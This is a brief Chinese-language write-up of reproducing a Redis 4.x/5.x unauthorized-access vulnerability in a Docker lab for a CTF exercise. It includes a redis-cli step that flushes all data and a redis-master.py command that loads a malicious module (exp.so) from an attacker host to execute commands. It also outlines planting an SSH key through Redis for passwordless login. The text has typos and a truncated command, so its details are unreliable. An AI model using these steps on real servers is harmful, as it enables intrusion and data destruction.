Redis 4.x/5.x非法访问漏洞在Redis非法访问4.x/5.0.5或更低版本中,使用master/slave模式加载远程模块,并使用动态链接库执行任何命令
漏洞再现最近遇到ctf的主题是通过ssrf和redis的非法访问打入内部网get shell,希望通过docker再现以下漏洞。
引出环境打开环境后,如图所示
您可以使用redis-cli -h your-ipj连接到redis数据库,并清空所有数据。 也就是说,存在非法访问漏洞
使用poc执行远程命令
编译下载的poc目录下的redismoudleSDK
但是,编译也会报告错误。 因为没有安装redis-cli
因为以前安装了ubantu靶机,但没有安装kali (之后发现没有影响仔细查找和查看整个脚本),所以我的8888端口号被占用,无法运行
python3redis-master.py-r 192.168.11.147-p 6379-l 192.168.11.129-p 8888-fredismodulesssdk/exp.so-c“
实现命令的执行
另一种方法是使用ssh密钥
您可以使用我的kali在ssh上生成空密码,将密钥传输到目标机redis,然后使用ssh在不加密的情况下登录。
这样再现就完成了